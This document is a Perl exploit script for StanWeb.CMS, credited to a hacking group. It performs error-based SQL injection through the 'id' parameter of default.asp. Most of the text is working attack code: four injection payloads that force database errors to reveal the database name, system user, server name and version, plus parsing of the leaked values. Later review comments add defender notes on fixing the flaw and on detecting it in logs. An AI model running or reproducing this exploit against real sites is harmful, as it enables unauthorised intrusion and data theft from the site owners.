
StanWeb.CMS (default.asp id) Remote SQL Injection Exploit



# --==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==--=0D 
# --==+               StanWeb.CMS (default.asp id) Remote SQL Injection Exploit            +==--=0D
# --==+====================================================================================+==--=0D
#                      [+] [JosS] + [Spanish Hackers Team] + [Sys - Project]=0D
=0D
# [+] Info:

# [~] Software: StanWeb.CMS
# [~] Exploit: Remote SQL Injection [High]
# [~] Bug Found By: JosS | Jose Luis Góngora Fernández
# [~] Contact: sys-project[at]hotmail.com
# [~] Web: http://www.spanish-hackers.com
# [~] Vuln File: default.asp
=0D
# [+] Exploit:=0D
=0D
#!/usr/bin/perl=0D
=0D
# StanWeb.CMS (default.asp id) Remote SQL Injection Exploit=0D
# Code by JosS=0D
# Contact: sys-project[at]hotmail.com=0D
# Spanish Hackers Team / EspSeC=0D
# www.spanish-hackers.com=0D 
=0D
# in memory of rgod :D=0D
=0D
use IO::Socket::INET;=0D
use LWP::UserAgent;=0D
use HTTP::Request;=0D
use LWP::Simple;=0D
=0D
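# Clear the terminal before the banner is printed; on native Windows also set
# the console title and text colour.
#
# Takes no arguments and returns nothing useful: it is purely cosmetic console
# I/O and is called in void context by the script.
sub lw {
    # $^O is 'MSWin32' on native Windows. A substring test for "win" also
    # matches 'darwin' (macOS) and 'cygwin', which would send those platforms
    # down the branch below; cls, title and color are cmd.exe built-ins and are
    # not available from a POSIX shell.
    if ($^O eq 'MSWin32') {
        system("cls");
        system("title StanWeb.CMS (default.asp id) Remote SQL Injection Exploit");
        system("color 02");
    }
    else {
        system("clear");
    }
    return;
}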
=0D
#*************************** expl ******************************=0D
=0D
=0D
# NOTE(review): the "=0D" at the end of every line in this listing is a
# quoted-printable encoded carriage return left over from mail transport. It
# is not Perl; the listing is shown as archived.

# Clear the console (lw is defined earlier in the file), then print the banner.
&lw;=0D
=0D
print "\t\t########################################################\n\n";=0D
print "\t\t#       StanWeb.CMS - Remote SQL Injection Exploit     #\n\n";=0D
print "\t\t#                        by JosS                       #\n\n";=0D
print "\t\t########################################################\n\n";=0D
=0D
=0D
# Build the request prefix from the first command-line argument: chop drops
# its last character unconditionally, then the page name and the "id" query
# parameter are appended. Every request the script makes therefore goes to
# default.asp with a crafted "id" value, which is the parameter to review in
# the application and to search for in web server logs.
$host=$ARGV[0];=0D
chop $host;=0D
$host=$host."/default.asp?id=";=0D
=0D
# Usage check: with no argument, print the usage text and exit with status 1.
# This runs only after $host has already been built above.
if(!$ARGV[0]) {=0D
    print "\n[x] StanWeb.CMS - Remote SQL Injection Exploit\n";=0D
    print "[x] written by JosS - sys-project[at]hotmail.com\n";=0D
    print "[x] usage: perl $0 [host]\n";=0D
print "[x] example: http://hostxx.com/web\n";=0D 
    exit(1);=0D
 }=0D
=0D
# Four values for the "id" parameter. Each one compares 1 with
# convert(int, <expr>), where <expr> is a T-SQL built-in that yields a string
# (db_name(), system_user, @@servername, @@version). The cast to int fails, and
# the resulting database error message contains the string value.
#
# Defender notes:
#  - This is error-based SQL injection. It works only if default.asp
#    concatenates "id" into the SQL text AND the database error is returned
#    to the client. Binding "id" as a typed parameter (or rejecting
#    non-numeric values) removes the injection; a generic error page removes
#    the disclosure channel; a least-privilege database login limits what a
#    successful injection can read.
#  - "convert(int," inside the query string of a default.asp request is a
#    usable log/WAF indicator for this script as published.
@comando=("1+and+1=convert(int,db_name())","1+and+1=convert(int,system_user)","1+and+1=convert(int,\@\@servername)--",'1+and+1=convert(int,@@version)--');=0D
=0D
=0D
# One GET request per payload, indices 0..3.
for ($i=0;$i<=3;$i++)=0D
=0D
{=0D
=0D
# A fresh LWP::UserAgent is created with no options on every iteration, so
# requests carry LWP's default User-Agent header (libwww-perl/<version>)
# unless the script is modified. as_string yields the whole response
# (status line, headers and body) as one string.
my $final = $host.$comando[$i];=0D
my $ua = LWP::UserAgent->new;=0D
my $req = HTTP::Request->new(GET => $final);=0D
$doc = $ua->request($req)->as_string;=0D
=0D
# Continue only if the response contains "Syntax" followed by whitespace and,
# somewhere later, a closing </font> tag (case-insensitive; /s lets "." span
# newlines). Presumably this targets the wording and markup of the database
# error page -- confirm against a real response.
if ( $doc =~ /Syntax\s(.*)<\/font>/mosix )=0D
{=0D
=0D
# The four branches below are selected by comparing the payload string itself.
# Each extracts the text between "value '" and "' to" from the response and
# prints it under a label. The result variables are package globals; if the
# inner match fails, the variable is printed with whatever value it already had.
if ($comando[$i] eq "1+and+1=convert(int,db_name())")=0D
{=0D
=0D
print "db_name:\n";=0D
=0D
$dbname = $1 if ($doc =~ /.*value\s'(.*)'\sto.*/);=0D
print "$dbname\n\n";=0D
=0D
}=0D
=0D
if ($comando[$i] eq "1+and+1=convert(int,system_user)")=0D
=0D
{=0D
=0D
print "system_user:\n";=0D
=0D
$systemuser = $1 if ($doc =~ /.*value\s'(.*)'\sto.*/);=0D
print "$systemuser\n\n";=0D
=0D
}=0D
=0D
if ($comando[$i] eq "1+and+1=convert(int,\@\@servername)--")=0D
=0D
{=0D
=0D
print "servername:\n";=0D
=0D
$servername = $1 if ($doc =~ /.*value\s'(.*)'\sto.*/);=0D
print "$servername\n\n";=0D
=0D
}=0D
=0D
if ($comando[$i] eq '1+and+1=convert(int,@@version)--')=0D
=0D
{=0D
=0D
print "version:\n";=0D
=0D
# Unlike the three patterns above, this one is non-greedy and uses /s, so the
# captured text may span several lines.
$version = $1 if ($doc =~ /.*?value\s'(.*?)'\sto.*/sm);=0D
print "$version\n\n";=0D
=0D
}=0D
=0D
} # end of the outer if=0D
} # end of the for loop=0D
=0D
=0D
# --==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==--=0D 
# --==+                                       JosS                                         +==--=0D
# --==+====================================================================================+==--=0D
#             
